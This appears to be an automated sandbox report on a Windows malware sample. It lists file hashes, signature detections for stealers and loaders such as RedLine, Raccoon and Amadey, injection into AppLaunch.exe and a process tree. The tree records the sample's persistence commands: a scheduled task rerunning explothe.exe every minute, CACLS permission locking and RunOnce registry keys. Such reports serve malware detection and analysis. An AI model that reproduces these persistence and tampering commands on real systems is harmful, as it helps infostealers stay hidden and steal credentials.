SHA512 9d3ca5bdb409847664f72497b3165cdf330ec64341fe318a324242eb8a1d6078a7330b5aedc620b360f89480709c3b8b1e0e9750a1d5192f64246b179b8ef21b

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\OhvJeSu.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

memory/872-759-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2780-761-0x000000013F700000-0x000000013FA66000-memory.dmp

memory/2088-771-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2088-773-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2088-774-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2088-777-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2780-776-0x000000013F700000-0x000000013FA66000-memory.dmp

memory/2088-787-0x0000000000080000-0x00000000000BE000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QJT1WABK\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\winload_prod.pdb

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-26 06:36

Reported

2023-10-26 06:38

Platform

win10v2004-20231023-en

Max time kernel

26s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\27C7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2032 set thread context of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\2E26.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3108 wrote to memory of 5000 N/A N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe
PID 3108 wrote to memory of 5000 N/A N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe
PID 3108 wrote to memory of 5000 N/A N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe
PID 3108 wrote to memory of 5016 N/A N/A C:\Users\Admin\AppData\Local\Temp\28A2.exe
PID 3108 wrote to memory of 5016 N/A N/A C:\Users\Admin\AppData\Local\Temp\28A2.exe
PID 3108 wrote to memory of 5016 N/A N/A C:\Users\Admin\AppData\Local\Temp\28A2.exe
PID 3108 wrote to memory of 1768 N/A N/A C:\Windows\system32\cmd.exe
PID 3108 wrote to memory of 1768 N/A N/A C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 5000 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 5000 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\27C7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe
PID 3108 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\2A89.exe
PID 3108 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\2A89.exe
PID 3108 wrote to memory of 4612 N/A N/A C:\Users\Admin\AppData\Local\Temp\2A89.exe
PID 5008 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 5008 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 5008 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe
PID 3108 wrote to memory of 1268 N/A N/A C:\Users\Admin\AppData\Local\Temp\2B84.exe
PID 3108 wrote to memory of 1268 N/A N/A C:\Users\Admin\AppData\Local\Temp\2B84.exe
PID 3108 wrote to memory of 1268 N/A N/A C:\Users\Admin\AppData\Local\Temp\2B84.exe
PID 3752 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 3752 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 3752 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe
PID 3108 wrote to memory of 552 N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe
PID 3108 wrote to memory of 552 N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe
PID 3108 wrote to memory of 552 N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe
PID 992 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 992 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 992 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe
PID 3108 wrote to memory of 2232 N/A N/A C:\Users\Admin\AppData\Local\Temp\2E26.exe
PID 3108 wrote to memory of 2232 N/A N/A C:\Users\Admin\AppData\Local\Temp\2E26.exe
PID 3108 wrote to memory of 2232 N/A N/A C:\Users\Admin\AppData\Local\Temp\2E26.exe
PID 3960 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 3960 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe
PID 3960 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\27C7.exe

C:\Users\Admin\AppData\Local\Temp\27C7.exe

C:\Users\Admin\AppData\Local\Temp\28A2.exe

C:\Users\Admin\AppData\Local\Temp\28A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\299D.bat" "

C:\Users\Admin\AppData\Local\Temp\2A89.exe

C:\Users\Admin\AppData\Local\Temp\2A89.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe

C:\Users\Admin\AppData\Local\Temp\2B84.exe

C:\Users\Admin\AppData\Local\Temp\2B84.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe

C:\Users\Admin\AppData\Local\Temp\2C6F.exe

C:\Users\Admin\AppData\Local\Temp\2C6F.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Yv41KG8.exe

C:\Users\Admin\AppData\Local\Temp\2E26.exe

C:\Users\Admin\AppData\Local\Temp\2E26.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2232 -ip 2232

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9186a46f8,0x7ff9186a4708,0x7ff9186a4718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9186a46f8,0x7ff9186a4708,0x7ff9186a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,8481321920796835987,9831548453769713675,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4696 -ip 4696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 540

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,6309549801319667691,357503778357398726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

